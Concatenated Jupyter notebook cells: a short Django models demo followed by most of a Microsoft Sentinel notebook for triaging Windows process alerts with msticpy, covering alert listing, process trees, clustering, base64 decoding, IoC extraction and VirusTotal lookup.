candidate_1 = SavedCandidate.objects.create(name='Candidate 1') candidate_2 = SavedCandidate.objects.create(name='Candidate 2') group_2 = Group.objects.create(name='Group 2') group_2_child = Group.objects.create(name='Group 2 Child', parent_group=group_2) group_2_child.saved_candidates.add(candidate_1) group_2_child.saved_candidates.add(candidate_2)
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
Lets loop all the groups and display there names, jobs and saved candiates for each.
for group in Group.objects.all(): print("Group: {}".format(group.name)) print("jobs: {}".format(group.jobs.count())) for job in group.jobs.all(): print(job.title) print("saved candidates: {}".format(group.saved_candidates.count())) for candidate in group.saved_candidates.all(): print(candidate.name) print("\n")
Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 2 Candidate 1 Candidate 2 Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 2 Candidate 1 Candidate 2 Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 0 Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 0 Group: My First Group jobs: 1 Job 1 saved candidates: 0 Group: Child of (My First Group) jobs: 1 Job 2 saved candidates: 0 Group: Group 2 jobs: 0 saved candidates: 0 Group: Group 2 Child jobs: 0 saved candidates: 2 Candidate 1 Candidate 2
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
Title: Alert Investigation (Windows Process Alerts)**Notebook Version:** 1.0**Python Version:** Python 3.6 (including Python 3.6 - AzureML)**Required Packages**: kqlmagic, msticpy, pandas, numpy, matplotlib, networkx, ipywidgets, ipython, scikit_learn**Platforms Supported**:- Azure Notebooks Free Compute- Azure Notebooks DSVM- OS Independent**Data Sources Required**:- Log Analytics - SecurityAlert, SecurityEvent (EventIDs 4688 and 4624/25)- (Optional) - VirusTotal (with API key) Description:This notebook is intended for triage and investigation of security alerts. It is specifically targeted at alerts triggered by suspicious process activity on Windows hosts. Some of the sections will work on other types of alerts but this is not guaranteed. Table of Contents- [Setup and Authenticate](setup)- [Get Alerts List](getalertslist)- [Choose an Alert to investigate](enteralertid) - [Extract Properties and entities from alert](extractalertproperties) - [Entity Graph](entitygraph)- [Related Alerts](related_alerts)- [Session Process Tree](processtree) - [Process Timeline](processtimeline)- [Other Process on Host](process_clustering)- [Check for IOCs in Commandline](cmdlineiocs) - [VirusTotal lookup](virustotallookup)- [Alert command line - Occurrence on other hosts in subscription](cmdlineonotherhosts)- [Host Logons](host_logons) - [Alert Account](logonaccount) - [Failed Logons](failed_logons)- [Appendices](appendices) - [Saving data to Excel](appendices) [Contents](toc) Setup1. Make sure that you have installed packages specified in the setup (uncomment the lines to execute)2. There are some manual steps up to selecting the alert ID. After this most of the notebook can be executed sequentially3. Major sections should be executable independently (e.g. Alert Command line and Host Logons can be run skipping Session Process Tree) Install PackagesThe first time this cell runs for a new Azure Notebooks project or local Python environment it will take several minutes to download and install the packages. In subsequent runs it should run quickly and confirm that package dependencies are already installed. Unless you want to upgrade the packages you can feel free to skip execution of the next cell.If you see any import failures (```ImportError```) in the notebook, please re-run this cell and answer 'y', then re-run the cell where the failure occurred. Note you may see some warnings about package incompatibility with certain packages. This does not affect the functionality of this notebook but you may need to upgrade the packages producing the warnings to a more recent version.
import sys import warnings warnings.filterwarnings("ignore",category=DeprecationWarning) MIN_REQ_PYTHON = (3,6) if sys.version_info < MIN_REQ_PYTHON: print('Check the Kernel->Change Kernel menu and ensure that Python 3.6') print('or later is selected as the active kernel.') sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON) # Package Installs - try to avoid if they are already installed try: import msticpy.sectools as sectools import Kqlmagic print('If you answer "n" this cell will exit with an error in order to avoid the pip install calls,') print('This error can safely be ignored.') resp = input('msticpy and Kqlmagic packages are already loaded. Do you want to re-install? (y/n)') if resp.strip().lower() != 'y': sys.exit('pip install aborted - you may skip this error and continue.') else: print('After installation has completed, restart the current kernel and run ' 'the notebook again skipping this cell.') except ImportError: pass print('\nPlease wait. Installing required packages. This may take a few minutes...') !pip install git+https://github.com/microsoft/msticpy --upgrade --user !pip install Kqlmagic --no-cache-dir --upgrade --user print('\nTo ensure that the latest versions of the installed libraries ' 'are used, please restart the current kernel and run ' 'the notebook again skipping this cell.')
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Import Python Packages Get WorkspaceIdTo find your Workspace Id go to [Log Analytics](https://ms.portal.azure.com/blade/HubsExtension/Resources/resourceType/Microsoft.OperationalInsights%2Fworkspaces). Look at the workspace properties to find the ID.
# Imports import sys MIN_REQ_PYTHON = (3,6) if sys.version_info < MIN_REQ_PYTHON: print('Check the Kernel->Change Kernel menu and ensure that Python 3.6') print('or later is selected as the active kernel.') sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON) import numpy as np from IPython import get_ipython from IPython.display import display, HTML, Markdown import ipywidgets as widgets import matplotlib.pyplot as plt import seaborn as sns import networkx as nx sns.set() import pandas as pd pd.set_option('display.max_rows', 500) pd.set_option('display.max_columns', 50) pd.set_option('display.max_colwidth', 100) import msticpy.sectools as sectools import msticpy.nbtools as mas import msticpy.nbtools.kql as qry import msticpy.nbtools.nbdisplay as nbdisp # Some of our dependencies (networkx) still use deprecated Matplotlib # APIs - we can't do anything about it so suppress them from view from matplotlib import MatplotlibDeprecationWarning warnings.simplefilter("ignore", category=MatplotlibDeprecationWarning) import os from msticpy.nbtools.wsconfig import WorkspaceConfig ws_config_file = 'config.json' WORKSPACE_ID = None TENANT_ID = None try: ws_config = WorkspaceConfig(ws_config_file) display(Markdown(f'Read Workspace configuration from local config.json for workspace **{ws_config["workspace_name"]}**')) for cf_item in ['tenant_id', 'subscription_id', 'resource_group', 'workspace_id', 'workspace_name']: display(Markdown(f'**{cf_item.upper()}**: {ws_config[cf_item]}')) if ('cookiecutter' not in ws_config['workspace_id'] or 'cookiecutter' not in ws_config['tenant_id']): WORKSPACE_ID = ws_config['workspace_id'] TENANT_ID = ws_config['tenant_id'] except: pass if not WORKSPACE_ID or not TENANT_ID: display(Markdown('**Workspace configuration not found.**\n\n' 'Please go to your Log Analytics workspace, copy the workspace ID' ' and/or tenant Id and paste here.<br> ' 'Or read the workspace_id from the config.json in your Azure Notebooks project.')) ws_config = None ws_id = mas.GetEnvironmentKey(env_var='WORKSPACE_ID', prompt='Please enter your Log Analytics Workspace Id:', auto_display=True) ten_id = mas.GetEnvironmentKey(env_var='TENANT_ID', prompt='Please enter your Log Analytics Tenant Id:', auto_display=True)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Authenticate to Log AnalyticsIf you are using user/device authentication, run the following cell. - Click the 'Copy code to clipboard and authenticate' button.- This will pop up an Azure Active Directory authentication dialog (in a new tab or browser window). The device code will have been copied to the clipboard. - Select the text box and paste (Ctrl-V/Cmd-V) the copied value. - You should then be redirected to a user authentication page where you should authenticate with a user account that has permission to query your Log Analytics workspace.Use the following syntax if you are authenticating using an Azure Active Directory AppId and Secret:```%kql loganalytics://tenant(aad_tenant).workspace(WORKSPACE_ID).clientid(client_id).clientsecret(client_secret)```instead of```%kql loganalytics://code().workspace(WORKSPACE_ID)```Note: you may occasionally see a JavaScript error displayed at the end of the authentication - you can safely ignore this.On successful authentication you should see a ```popup schema``` button.
if not WORKSPACE_ID or not TENANT_ID: try: WORKSPACE_ID = ws_id.value TENANT_ID = ten_id.value except NameError: raise ValueError('No workspace or Tenant Id.') mas.kql.load_kql_magic() %kql loganalytics://code().tenant(TENANT_ID).workspace(WORKSPACE_ID)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Get Alerts ListSpecify a time range to search for alerts. One this is set run the following cell to retrieve any alerts in that time window.You can change the time range and re-run the queries until you find the alerts that you want.
alert_q_times = mas.QueryTime(units='day', max_before=20, before=5, max_after=1) alert_q_times.display() alert_counts = qry.list_alerts_counts(provs=[alert_q_times]) alert_list = qry.list_alerts(provs=[alert_q_times]) print(len(alert_counts), ' distinct alert types') print(len(alert_list), ' distinct alerts') display(HTML('<h2>Alert Timeline</h2>')) nbdisp.display_timeline(data=alert_list, source_columns = ['AlertName', 'CompromisedEntity'], title='Alerts', height=200) display(HTML('<h2>Top alerts</h2>')) alert_counts.head(20) # remove '.head(20)'' to see the full list grouped by AlertName
12 distinct alert types 51 distinct alerts
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Choose Alert to InvestigateEither pick an alert from a list of retrieved alerts or paste the SystemAlertId into the text box in the following section. Select alert from listAs you select an alert, the main properties will be shown below the list.Use the filter box to narrow down your search to any substring in the AlertName.
alert_select = mas.AlertSelector(alerts=alert_list, action=nbdisp.display_alert) alert_select.display()
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Or paste in an alert ID and fetch it**Skip this if you selected from the above list**
# Allow alert to be selected # Allow subscription to be selected get_alert = mas.GetSingleAlert(action=nbdisp.display_alert) get_alert.display()
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Extract properties and entities from AlertThis section extracts the alert information and entities into a SecurityAlert object allowing us to query the properties more reliably. In particular, we use the alert to automatically provide parameters for queries and UI elements.Subsequent queries will use properties like the host name and derived properties such as the OS family (Linux or Windows) to adapt the query. Query time selectors like the one above will also default to an origin time that matches the alert selected.The alert view below shows all of the main properties of the alert plus the extended property dictionary (if any) and JSON representations of the Entity.
# Extract entities and properties into a SecurityAlert class if alert_select.selected_alert is None and get_alert.selected_alert is None: sys.exit("Please select an alert before executing remaining cells.") if get_alert.selected_alert is not None: security_alert = mas.SecurityAlert(get_alert.selected_alert) elif alert_select.selected_alert is not None: security_alert = mas.SecurityAlert(alert_select.selected_alert) mas.disp.display_alert(security_alert, show_entities=True)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Entity GraphDepending on the type of alert there may be one or more entities attached as properties. Entities are things like Host, Account, IpAddress, Process, etc. - essentially the 'nouns' of security investigation. Events and alerts are the things that link them in actions so can be thought of as the verbs. Entities are often related to other entities - for example a process will usually have a related file entity (the process image) and an Account entity (the context in which the process was running). Endpoint alerts typically always have a host entity (which could be a physical or virtual machine). Plot using Networkx/Matplotlib
# Draw the graph using Networkx/Matplotlib %matplotlib inline alertentity_graph = mas.create_alert_graph(security_alert) nbdisp.draw_alert_entity_graph(alertentity_graph, width=15)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Related AlertsFor a subset of entities in the alert we can search for any alerts that have that entity in common. Currently this query looks for alerts that share the same Host, Account or Process and lists them below. **Notes:**- Some alert types do not include all of these entity types.- The original alert will be included in the "Related Alerts" set if it occurs within the query time boundary set below.The query time boundaries default to a longer period than when searching for the alert. You can extend the time boundary searched before or after the alert time. If the widget doesn't support the time boundary that you want you can change the max_before and max_after parameters in the call to QueryTime below to extend the possible time boundaries.
# set the origin time to the time of our alert query_times = mas.QueryTime(units='day', origin_time=security_alert.TimeGenerated, max_before=28, max_after=1, before=5) query_times.display() related_alerts = qry.list_related_alerts(provs=[query_times, security_alert]) if related_alerts is not None and not related_alerts.empty: host_alert_items = related_alerts\ .query('host_match == @True')[['AlertType', 'StartTimeUtc']]\ .groupby('AlertType').StartTimeUtc.agg('count').to_dict() acct_alert_items = related_alerts\ .query('acct_match == @True')[['AlertType', 'StartTimeUtc']]\ .groupby('AlertType').StartTimeUtc.agg('count').to_dict() proc_alert_items = related_alerts\ .query('proc_match == @True')[['AlertType', 'StartTimeUtc']]\ .groupby('AlertType').StartTimeUtc.agg('count').to_dict() def print_related_alerts(alertDict, entityType, entityName): if len(alertDict) > 0: print('Found {} different alert types related to this {} (\'{}\')' .format(len(alertDict), entityType, entityName)) for (k,v) in alertDict.items(): print(' {}, Count of alerts: {}'.format(k, v)) else: print('No alerts for {} entity \'{}\''.format(entityType, entityName)) print_related_alerts(host_alert_items, 'host', security_alert.hostname) print_related_alerts(acct_alert_items, 'account', security_alert.primary_account.qualified_name if security_alert.primary_account else None) print_related_alerts(proc_alert_items, 'process', security_alert.primary_process.ProcessFilePath if security_alert.primary_process else None) nbdisp.display_timeline(data=related_alerts, source_columns = ['AlertName'], title='Alerts', height=100) else: display(Markdown('No related alerts found.'))
Found 8 different alert types related to this host ('msticalertswin1') Detected potentially suspicious use of Telegram tool, Count of alerts: 2 Detected the disabling of critical services, Count of alerts: 2 Digital currency mining related behavior detected, Count of alerts: 2 Potential attempt to bypass AppLocker detected, Count of alerts: 4 Security incident detected, Count of alerts: 2 Security incident with shared process detected, Count of alerts: 3 Suspicious system process executed, Count of alerts: 2 Suspiciously named process detected, Count of alerts: 2 Found 13 different alert types related to this account ('msticalertswin1\msticadmin') An history file has been cleared, Count of alerts: 12 Azure Security Center test alert (not a threat), Count of alerts: 13 Detected potentially suspicious use of Telegram tool, Count of alerts: 2 Detected the disabling of critical services, Count of alerts: 2 Digital currency mining related behavior detected, Count of alerts: 2 New SSH key added, Count of alerts: 13 Possible credential access tool detected, Count of alerts: 11 Possible suspicious scheduling tasks access detected, Count of alerts: 1 Potential attempt to bypass AppLocker detected, Count of alerts: 3 Suspicious Download Then Run Activity, Count of alerts: 13 Suspicious binary detected, Count of alerts: 13 Suspicious system process executed, Count of alerts: 2 Suspiciously named process detected, Count of alerts: 2 Found 2 different alert types related to this process ('c:\w!ndows\system32\suchost.exe') Digital currency mining related behavior detected, Count of alerts: 2 Suspiciously named process detected, Count of alerts: 2
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Show these related alerts on a graphThis should indicate which entities the other alerts are related to.This can be unreadable with a lot of alerts. Use the matplotlib interactive zoom control to zoom in to part of the graph.
# Draw a graph of this (add to entity graph) %matplotlib notebook %matplotlib inline if related_alerts is not None and not related_alerts.empty: rel_alert_graph = mas.add_related_alerts(related_alerts=related_alerts, alertgraph=alertentity_graph) nbdisp.draw_alert_entity_graph(rel_alert_graph, width=15) else: display(Markdown('No related alerts found.'))
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Browse List of Related AlertsSelect an Alert to view details. If you want to investigate that alert - copy its *SystemAlertId* property and open a new instance of this notebook to investigate this alert.
def disp_full_alert(alert): global related_alert related_alert = mas.SecurityAlert(alert) nbdisp.display_alert(related_alert, show_entities=True) if related_alerts is not None and not related_alerts.empty: related_alerts['CompromisedEntity'] = related_alerts['Computer'] print('Selected alert is available as \'related_alert\' variable.') rel_alert_select = mas.AlertSelector(alerts=related_alerts, action=disp_full_alert) rel_alert_select.display() else: display(Markdown('No related alerts found.'))
Selected alert is available as 'related_alert' variable.
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Get Process TreeIf the alert has a process entity this section tries to retrieve the entire process tree to which that process belongs.Notes:- The alert must have a process entity- Only processes started within the query time boundary will be included- Ancestor and descented processes are retrieved to two levels (i.e. the parent and grandparent of the alert process plus any child and grandchild processes).- Sibling processes are the processes that share the same parent as the alert process- This can be a long-running query, especially if a wide time window is used! Caveat Emptor!The source (alert) process is shown in red.What's shown for each process:- Each process line is indented according to its position in the tree hierarchy- Top line fields: - \[relationship to source process:lev - where is the hops away from the source process\] - Process creation date-time (UTC) - Process Image path - PID - Process Id - SubjSess - the session Id of the process spawning the new process - TargSess - the new session Id if the process is launched in another context/session. If 0/0x0 then the process is launched in the same session as its parent- Second line fields: - Process command line - Account - name of the account context in which the process is running
# set the origin time to the time of our alert query_times = mas.QueryTime(units='minute', origin_time=security_alert.origin_time) query_times.display() from msticpy.nbtools.query_defns import DataFamily if security_alert.data_family != DataFamily.WindowsSecurity: raise ValueError('The remainder of this notebook currently only supports Windows. ' 'Linux support is in development but not yet implemented.') def extract_missing_pid(security_alert): for pid_ext_name in ['Process Id', 'Suspicious Process Id']: pid = security_alert.ExtendedProperties.get(pid_ext_name, None) if pid: return pid def extract_missing_sess_id(security_alert): sess_id = security_alert.ExtendedProperties.get('Account Session Id', None) if sess_id: return sess_id for session in [e for e in security_alert.entities if e['Type'] == 'host-logon-session' or e['Type'] == 'hostlogonsession']: return session['SessionId'] if (security_alert.primary_process): # Do some patching up if the process entity doesn't have a PID pid = security_alert.primary_process.ProcessId if not pid: pid = extract_missing_pid(security_alert) if pid: security_alert.primary_process.ProcessId = pid else: raise ValueError('Could not find the process Id for the alert process.') # Do the same if we can't find the account logon ID if not security_alert.get_logon_id(): sess_id = extract_missing_sess_id(security_alert) if sess_id and security_alert.primary_account: security_alert.primary_account.LogonId = sess_id else: raise ValueError('Could not find the session Id for the alert process.') # run the query process_tree = qry.get_process_tree(provs=[query_times, security_alert]) if len(process_tree) > 0: # Print out the text view of the process tree nbdisp.display_process_tree(process_tree) else: display(Markdown('No processes were returned so cannot obtain a process tree.' '\n\nSkip to [Other Processes](#process_clustering) later in the' ' notebook to retrieve all processes')) else: display(Markdown('This alert has no process entity so cannot obtain a process tree.' '\n\nSkip to [Other Processes](#process_clustering) later in the' ' notebook to retrieve all processes')) process_tree = None
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Process TimeLineThis shows each process in the process tree on a timeline view.Labelling of individual process is very performance intensive and often results in nothing being displayed at all! Besides, for large numbers of processes it would likely result in an unreadable mess. Your main tools for negotiating the timeline are the Hover tool (toggled on and off by the speech bubble icon) and the wheel-zoom and pan tools (the former is an icon with an elipse and a magnifying glass, the latter is the crossed-arrows icon). The wheel zoom is particularly useful.As you hover over each process it will display the image name, PID and commandline.Also shown on the graphic is the timestamp line of the source/alert process.
# Show timeline of events if process_tree is not None and not process_tree.empty: nbdisp.display_timeline(data=process_tree, alert=security_alert, title='Alert Process Session', height=250)
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Other Processes on Host - ClusteringSometimes you don't have a source process to work with. Other times it's just useful to see what else is going on on the host. This section retrieves all processes on the host within the time boundsset in the query times widget.You can display the raw output of this by looking at the *processes_on_host* dataframe. Just copy this into a new cell and hit Ctrl-Enter.Usually though, the results return a lot of very repetitive and unintersting system processes so we attempt to cluster these to make the view easier to negotiate. To do this we process the raw event list output to extract a few features that render strings (such as commandline)into numerical values. The default below uses the following features:- commandLineTokensFull - this is a count of common delimiters in the commandline (given by this regex r'[\s\-\\/\.,"\'|&:;%$()]'). The aim of this is to capture the commandline structure while ignoring variations on what is essentially the same pattern (e.g. temporary path GUIDs, target IP or host names, etc.)- pathScore - this sums the ordinal (character) value of each character in the path (so /bin/bash and /bin/bosh would have similar scores).- isSystemSession - 1 if this is a root/system session, 0 if anything else.Then we run a clustering algorithm (DBScan in this case) on the process list. The result groups similar (noisy) processes together and leaves unique process patterns as single-member clusters. Clustered Processes (i.e. processes that have a cluster size > 1)
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features processes_on_host = qry.list_processes(provs=[query_times, security_alert]) if processes_on_host is not None and not processes_on_host.empty: feature_procs = add_process_features(input_frame=processes_on_host, path_separator=security_alert.path_separator) # you might need to play around with the max_cluster_distance parameter. # decreasing this gives more clusters. (clus_events, dbcluster, x_data) = dbcluster_events(data=feature_procs, cluster_columns=['commandlineTokensFull', 'pathScore', 'isSystemSession'], max_cluster_distance=0.0001) print('Number of input events:', len(feature_procs)) print('Number of clustered events:', len(clus_events)) clus_events[['ClusterSize', 'processName']][clus_events['ClusterSize'] > 1].plot.bar(x='processName', title='Process names with Cluster > 1', figsize=(12,3)); else: display(Markdown('Unable to obtain any processes for this host. This feature' ' is currently only supported for Windows hosts.' '\n\nIf this is a Windows host skip to [Host Logons](#host_logons)' ' later in the notebook to examine logon events.'))
Number of input events: 190 Number of clustered events: 24
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Variability in Command Lines and Process NamesThe top chart shows the variability of command line content for a give process name. The wider the box, the more instances were found with different command line structure Note, the 'structure' in this case is measured by the number of tokens or delimiters in the command line and does not look at content differences. This is done so that commonly varying instances of the same command line are grouped together.For example `updatepatch host1.mydom.com` and `updatepatch host2.mydom.com` will be grouped together.The second chart shows the variability in executable path. This does compare content so `c:\windows\system32\net.exe` and `e:\windows\system32\net.exe` are treated as distinct. You would normally not expect to see any variability in this chart unless you have multiple copies of the same name executable or an executable is trying masquerade as another well-known binary.
# Looking at the variability of commandlines and process image paths import seaborn as sns sns.set(style="darkgrid") if processes_on_host is not None and not processes_on_host.empty: proc_plot = sns.catplot(y="processName", x="commandlineTokensFull", data=feature_procs.sort_values('processName'), kind='box', height=10) proc_plot.fig.suptitle('Variability of Commandline Tokens', x=1, y=1) proc_plot = sns.catplot(y="processName", x="pathLogScore", data=feature_procs.sort_values('processName'), kind='box', height=10, hue='isSystemSession') proc_plot.fig.suptitle('Variability of Path', x=1, y=1);
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
The top graph shows that, for a given process, some have a wide variability in their command line content while the majority have little or none. Looking at a couple of examples - like cmd.exe, powershell.exe, reg.exe, net.exe - we can recognize several common command line tools.The second graph shows processes by full process path content. We wouldn't normally expect to see variation here - as is the cast with most. There is also quite a lot of variance in the score making it a useful proxy feature for unique path name (this means that proc1.exe and proc2.exe that have the same commandline score won't get collapsed into the same cluster).Any process with a spread of values here means that we are seeing the same process name (but not necessarily the same file) is being run from different locations.
if not clus_events.empty: resp = input('View the clustered data? y/n') if resp == 'y': display(clus_events.sort_values('TimeGenerated')[['TimeGenerated', 'LastEventTime', 'NewProcessName', 'CommandLine', 'ClusterSize', 'commandlineTokensFull', 'pathScore', 'isSystemSession']]) # Look at clusters for individual process names def view_cluster(exe_name): display(clus_events[['ClusterSize', 'processName', 'CommandLine', 'ClusterId']][clus_events['processName'] == exe_name]) display(Markdown('You can view the cluster members for individual processes' 'by inserting a new cell and entering:<br>' '`>>> view_cluster(process_name)`<br></div>' 'where process_name is the unqualified process binary. E.g<br>' '`>>> view_cluster(\'reg.exe\')`'))
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
Time showing clustered vs. original data
# Show timeline of events - clustered events if not clus_events.empty: nbdisp.display_timeline(data=clus_events, overlay_data=processes_on_host, alert=security_alert, title='Distinct Host Processes (top) and All Proceses (bottom)')
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Base64 Decode and Check for IOCsThis section looks for Indicators of Compromise (IoC) within the data sets passed to it.The first section looks at the commandline for the alert process (if any). It also looks for base64 encoded strings within the data - this is a common way of hiding attacker intent. It attempts to decode any strings that look like base64. Additionally, if the base64 decode operation returns any items that look like a base64 encoded string or file, a gzipped binary sequence, a zipped or tar archive, it will attempt to extract the contents before searching for potentially interesting items.
process = security_alert.primary_process ioc_extractor = sectools.IoCExtract() if process: # if nothing is decoded this just returns the input string unchanged base64_dec_str, _ = sectools.b64.unpack_items(input_string=process["CommandLine"]) if base64_dec_str and '<decoded' in base64_dec_str: print('Base64 encoded items found.') print(base64_dec_str) # any IoCs in the string? iocs_found = ioc_extractor.extract(base64_dec_str) if iocs_found: print('\nPotential IoCs found in alert process:') display(iocs_found) else: print('Nothing to process')
Potential IoCs found in alert process:
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
If we have a process tree, look for IoCs in the whole data setYou can replace the data=process_tree parameter to ioc_extractor.extract() to pass other data frames.use the columns parameter to specify which column or columns that you want to search.
ioc_extractor = sectools.IoCExtract() try: if not process_tree.empty: source_processes = process_tree else: source_processes = clus_events except NameError: source_processes = None if source_processes is not None: ioc_df = ioc_extractor.extract(data=source_processes, columns=['CommandLine'], os_family=security_alert.os_family, ioc_types=['ipv4', 'ipv6', 'dns', 'url', 'md5_hash', 'sha1_hash', 'sha256_hash']) if len(ioc_df): display(HTML("<h3>IoC patterns found in process tree.</h3>")) display(ioc_df) else: ioc_df = None
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
If any Base64 encoded strings, decode and search for IoCs in the results.For simple strings the Base64 decoded output is straightforward. However for nested encodings this can get a little complex and difficult to represent in a tabular format.**Columns** - reference - The index of the row item in dotted notation in depth.seq pairs (e.g. 1.2.2.3 would be the 3 item at depth 3 that is a child of the 2nd item found at depth 1). This may not always be an accurate notation - it is mainly use to allow you to associate an individual row with the reference value contained in the full_decoded_string column of the topmost item). - original_string - the original string before decoding. - file_name - filename, if any (only if this is an item in zip or tar file). - file_type - a guess at the file type (this is currently elementary and only includes a few file types). - input_bytes - the decoded bytes as a Python bytes string. - decoded_string - the decoded string if it can be decoded as a UTF-8 or UTF-16 string. Note: binary sequences may often successfully decode as UTF-16 strings but, in these cases, the decodings are meaningless. - encoding_type - encoding type (UTF-8 or UTF-16) if a decoding was possible, otherwise 'binary'. - file_hashes - collection of file hashes for any decoded item. - md5 - md5 hash as a separate column. - sha1 - sha1 hash as a separate column. - sha256 - sha256 hash as a separate column. - printable_bytes - printable version of input_bytes as a string of \xNN values - src_index - the index of the row in the input dataframe from which the data came. - full_decoded_string - the full decoded string with any decoded replacements. This is only really useful for top-level items, since nested items will only show the 'full' string representing the child fragment.
if source_processes is not None: dec_df = sectools.b64.unpack_items(data=source_processes, column='CommandLine') if source_processes is not None and not dec_df.empty: display(HTML("<h3>Decoded base 64 command lines</h3>")) display(HTML("Warning - some binary patterns may be decodable as unicode strings")) display(dec_df[['full_decoded_string', 'original_string', 'decoded_string', 'input_bytes', 'file_hashes']]) ioc_dec_df = ioc_extractor.extract(data=dec_df, columns=['full_decoded_string']) if len(ioc_dec_df): display(HTML("<h3>IoC patterns found in base 64 decoded data</h3>")) display(ioc_dec_df) if ioc_df is not None: ioc_df = ioc_df.append(ioc_dec_df ,ignore_index=True) else: ioc_df = ioc_dec_df else: print("No base64 encodings found.") ioc_df = None
_____no_output_____
MIT
Notebooks/Sample-Notebooks/Example - Guided Investigation - Process-Alerts.ipynb
h0tp0ck3t/Sentinel
[Contents](toc) Virus Total LookupThis section uses the popular Virus Total service to check any recovered IoCs against VTs database.To use this you need an API key from virus total, which you can obtain here: https://www.virustotal.com/.Note that VT throttles requests for free API keys to 4/minute. If you are unable to process the entire data set, try splitting it and submitting smaller chunks.**Things to note:**- Virus Total lookups include file hashes, domains, IP addresses and URLs.- The returned data is slightly different depending on the input type- The VTLookup class tries to screen input data to prevent pointless lookups. E.g.: - Only public IP Addresses will be submitted (no loopback, private address space, etc.) - URLs with only local (unqualified) host parts will not be submitted. - Domain names that are unqualified will not be submitted. - Hash-like strings (e.g 'AAAAAAAAAAAAAAAAAA') that do not appear to have enough entropy to be a hash will not be submitted.**Output Columns** - Observable - The IoC observable submitted - IoCType - the IoC type - Status - the status of the submission request - ResponseCode - the VT response code - RawResponse - the entire raw json response - Resource - VT Resource - SourceIndex - The index of the Observable in the source DataFrame. You can use this to rejoin to your original data. - VerboseMsg - VT Verbose Message - ScanId - VT Scan ID if any - Permalink - VT Permanent URL describing the resource - Positives - If this is not zero, it indicates the number of malicious reports that VT holds for this observable. - MD5 - The MD5 hash, if any - SHA1 - The MD5 hash, if any - SHA256 - The MD5 hash, if any - ResolvedDomains - In the case of IP Addresses, this contains a list of all domains that resolve to this IP address - ResolvedIPs - In the case Domains, this contains a list of all IP addresses resolved from the domain. - DetectedUrls - Any malicious URLs associated with the observable.
